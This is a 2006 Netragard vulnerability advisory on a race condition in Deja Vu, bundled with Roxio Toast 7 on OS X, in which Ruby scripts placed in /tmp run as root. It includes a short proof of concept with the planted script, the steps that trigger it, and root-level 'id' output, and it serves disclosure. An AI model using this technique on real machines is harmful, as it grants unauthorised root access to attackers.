******************** Netragard, L.L.C Advisory* ******************* 09/11/2006 Strategic Reconnaissance Team ------------------------------------------------ http://www.netragard.com -- "We make I.T. Safe." [About Netragard] ---------------------------------------------------------------------- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems and Applications commonly used by businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [ For more information please visit http://www.netragard.com ] [Advisory Information] ---------------------------------------------------------------------- Contact : Adriel T. Desautels Advisory ID : NETRAGARD-20060624 Product Name : Roxio Toast Product Version : 7 Titanium Vendor Name : Roxio Type of Vulnerability : Local Root Compromise Effort : Difficult, depends on timing. Operating System : OSX Other : Race Condition Explpoitation in Deja Vu which is bundled into Roxio Toast. Deja Vu is the product of Propoganda Productions. [Product Description] ---------------------------------------------------------------------- "Toast 7 is the best way to save, share and enjoy a lifetime of digital music, movies and photos on CD and DVD. Burn large files across multiple discs; compress and copy DVD movies; add over 50 hours of music to an audio DVD with on-screen TV menus, shuffle play, and rich Dolby Digital sound; burn DivX files into DVDs. Do it all with the fastest and most reliable burning software for the Mac OS - Toast." --http://www.roxio.com-- [Technical Summary] ---------------------------------------------------------------------- Deja Vu, which is bundled with Roxio Toast 7, creates ruby scripts in the /tmp directory. These scripts contain commands which are executed with escilated privileges. A race condition exists which makes it possible to execute arbritrary commands against the system or gain root level access. [Technical Details] ---------------------------------------------------------------------- This was tested using a configured version of Roxio Toast 7 Titanium. (reproduction depends on timing) ###################################################################### # # dejavu_manual.rb was created by user test # ###################################################################### netragard-test> ls -al /tmp/dejavu_manual.rb -rw-r--r-- 1 test wheel 32843 Jul 7 21:41 /tmp/dejavu_manual.rb ###################################################################### # # The contents of dejavu_manual.rb # ###################################################################### netragard-test>cat test.rb #!/usr/bin/ruby system '/usr/bin/id' ###################################################################### # # 1) Open the System Preferences # 2) Click on deja vu # 3) Perform a manual backup. # 4) Notice uid=0(root) # ###################################################################### netragard-test> /Applications/System\ Preferences.app/Contents/MacOS/ System\ Preferences uid=0(root) gid=501(test) groups=501(test), 81(appserveradm), 79(appserverusr), 80(admin) [Proof Of Concept] ---------------------------------------------------------------------- Demonstrated above. [Vendor Status] ---------------------------------------------------------------------- Propaganda Productions was notified by Sonic Solutions on behalf of Netragard, L.L.C. on August 10th 2006. As of today Netragard has not received any response from Propaganda Productions. [Disclaimer] ---------------------http://www.netragard.com------------------------- Netragard, L.L.C. assumes no liability for the use of the information provided in this advisory. This advisory was released in an effort to help the I.T. community protect themselves against a potentially dangerous security hole. This advisory is not an attempt to solicit business.